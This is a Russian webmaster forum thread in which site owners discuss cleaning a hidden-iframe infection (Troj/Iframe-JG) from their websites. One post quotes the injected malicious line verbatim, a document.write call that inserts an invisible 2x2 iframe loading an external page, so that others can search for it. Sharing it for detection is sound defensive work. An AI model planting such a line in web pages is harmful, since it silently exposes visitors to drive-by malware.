Неизвестный вирус на сайте

12
T
На сайте с 15.06.2008
Offline
72
#11

Нет, теперь не ругается.

Оффтоп. Полазил по сайту - много орфографических ошибок :)

vertuhay2
На сайте с 31.03.2013
Offline
64
#12

У меня норм каспер не ругается, я и не думал что можно юкоз сайт так заразить.

скачать игры на пк (https://gig-games.net/) | скачать на телефон (https://gg33.top) | скачать торрент (https://torrent-film.monna.top/)
sereganez
На сайте с 26.09.2012
Offline
12
#13
Tkheun:
Нет, теперь не ругается.
Оффтоп. Полазил по сайту - много орфографических ошибок :)

1. Отлично! Осталось только посмотреть на реакцию Яндекса. Вчера служба поддержки Яндекса ответила, что просмотрит детально сайт на наличие вредоносного ПО.

2. Пароли поменял.

3. О результатах потом обязательно отпишусь, чтобы остальные вебмастера могли решить похожую проблему.

P.S. Это уже другой вопрос для другой темы. Сайт большой и исправлять все моментально я не могу. Нужно будет установить какой-то сервис для оповещения ошибок. В комментариях также об этом пишут.

R
На сайте с 24.01.2008
Offline
180
#14

ТС не ориентируйтесь на сервисы, т.к. они не покажут вам точную картину, проверьте сайт глазами потом уже анализируйте.

Удаление вирусов с сайта, защита сайта, Гарантия! ( /ru/forum/999073 ) -> топик на маулталк ( http://www.maultalk.com/topic113834s0.html ) -> Топик в сапе ( http://forum.sape.ru/showthread.php?t=79363 ). TELEGRAM - https://t.me/Doktorsaitov
sereganez
На сайте с 26.09.2012
Offline
12
#15
Rxp:
ТС не ориентируйтесь на сервисы, т.к. они не покажут вам точную картину, проверьте сайт глазами потом уже анализируйте.

Своими глазами я нашел код (о нем я писал выше), который хранился в *.js файлах.

Странно то, что он был размещен не во всех, а в определенных *.js файлах, которые между собой вообще никак не связаны. Это немного усложнило процесс поиска кода.

Использую NOD32, но он не нашел никаких вирусов на сайте. Буду очень благодарен за получение "ругательных текстов" от других антивирусных систем. Это значительно ускорит процесс поиска вредоносного ПО.

SeVlad
На сайте с 03.11.2008
Offline
1609
#16
sereganez:
Это значительно ускорит процесс поиска вредоносного ПО.

Значительно ускорился б этот процесс, если бы был прочтён закреплённый топик в этом разделе.

Ссылки не даю - хоть с этим сам справься ;)

Делаю хорошие сайты хорошим людям. Предпочтение коммерческим направлениям. Связь со мной через http://wp.me/P3YHjQ-3.
sereganez
На сайте с 26.09.2012
Offline
12
#17
SeVlad:
Значительно ускорился б этот процесс, если бы был прочтён закреплённый топик в этом разделе.

Читал, нет доступа к файлу .htaccess, писал в тех.поддержку, чтобы предоставили возможность его редактировать. Пока молчат.

Проблемный код найден, очищен в тех файлах, которые его использовали. Полностью ли удален вредоносный код с сайта - будет известно после обновления сайта Яндексом.

Всем вебмастерам, которые столкнутся с данной проблемой:

ищите в файлах *.js (возможно, будут другие форматы), дописанный код типа

document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://globetask.com/wbny.html?j=2827125></iframe>');

О результатах отпишусь после обновления сайта.

SeVlad
На сайте с 03.11.2008
Offline
1609
#18
sereganez:
нет доступа к файлу .htaccess, писал в тех.поддержку, чтобы предоставили возможность его редактировать. Пока молчат.

Афигеть! Это что за хостинг такой? Фрихост чоли?

sereganez
На сайте с 26.09.2012
Offline
12
#19
SeVlad:
Афигеть! Это что за хостинг такой? Фрихост чоли?

Писал уже об этом тут: /ru/forum/comment/11621543

Интересно другое - если я только что изменил пароли, то не узнает ли об этом злоумышленник? Ведь, насколько я понял, файлы редактировались путем проникновения на сервер (фтп)?

L
На сайте с 05.04.2013
Offline
0
#20

Добрый день)

я почти чайник.......

проблемма абсолютно такая же Troj/Iframe-JG...

но с продолжением)

сайт у меня простой html

технически весьма примитивный, написан руками поэтому где какая буква в кодах моя я знаю

http://kalevallafold.ru/ один из...

проблема в том, что "не мои" вредоносные участки в коде стр. и папках я вижу

.htaccess в корневой нету

есть все сайты на домашнем компе.. в "домашних" вариантах чисто..

удалила с хостинга все левые папки, перекачала все стр. , dr web оценил сайт как чистый, сменила пароли...

на след. день все заново произошло... и так 3 день((

яндекс ругается на зараженные сайты - гугл нет..

вопрос: может ли эта зараза быть с моего компа?

свой Dr.Web CureIt проверила вдоль и поперек - пишет нет угроз никаких(

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий